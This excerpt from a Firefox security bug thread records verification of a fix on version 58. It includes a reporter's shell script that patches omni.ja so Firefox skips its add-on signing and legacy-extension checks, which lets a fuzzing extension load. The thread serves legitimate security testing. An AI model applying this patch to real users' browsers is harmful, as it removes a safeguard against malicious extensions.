- the fuzzPriv extension cannot be installed, even with xpinstall.signatures.required set to false, extensions.legacy.enabled set to true or extensions.allow-non-mpc-extensions set to true
- I cannot find a DevEdition asan build in https://tools.taskcluster.net/index/artifacts/gecko.v2
- the fuzzing build workaround is not working in this case
Is there another workaround in order to verify this issue on Fx 58? 
If no, Nils, do you think you can verify this on 58?
Status: RESOLVED → VERIFIED
Flags: needinfo?(nils)
Flags: needinfo?(mwobensmith)
(Reporter)

Comment 20

a year ago
Yes, I can verify that this is fixed on 58 as well.

In order to get the fuzzPriv extensions running on beta and release I use a fairly dirty hack to disable the signing and legacy checks. The following shell script does this:

#!/bin/sh
set -e
mkdir tmp
cd tmp
unzip ../firefox/omni.ja
# Drop the precompiled copy so the patched module below is the one loaded.
rm ./jsloader/resource/gre/modules/addons/XPIProvider.jsm
# Make the add-on manager never require signatures ...
sed -i -e 's/function mustSign(aType) [{]/ function mustSign(aType) {return false;/g' ./modules/addons/XPIProvider.jsm
# ... and never disable legacy (non-WebExtension) add-ons.
sed -i -e 's/function isDisabledLegacy(addon) [{]/function isDisabledLegacy(addon) {return false;/g' ./modules/addons/XPIProvider.jsm
# Repack omni.ja in place.
rm ../firefox/omni.ja
zip -qr9XD ../firefox/omni.ja *
cd ..
Flags: needinfo?(nils)
Thanks for verifying, Nils, and thanks for the information on how to work around the fuzzPriv issue.
Flags: needinfo?(mwobensmith)
Flags: sec-bounty? → sec-bounty+
Group: core-security-release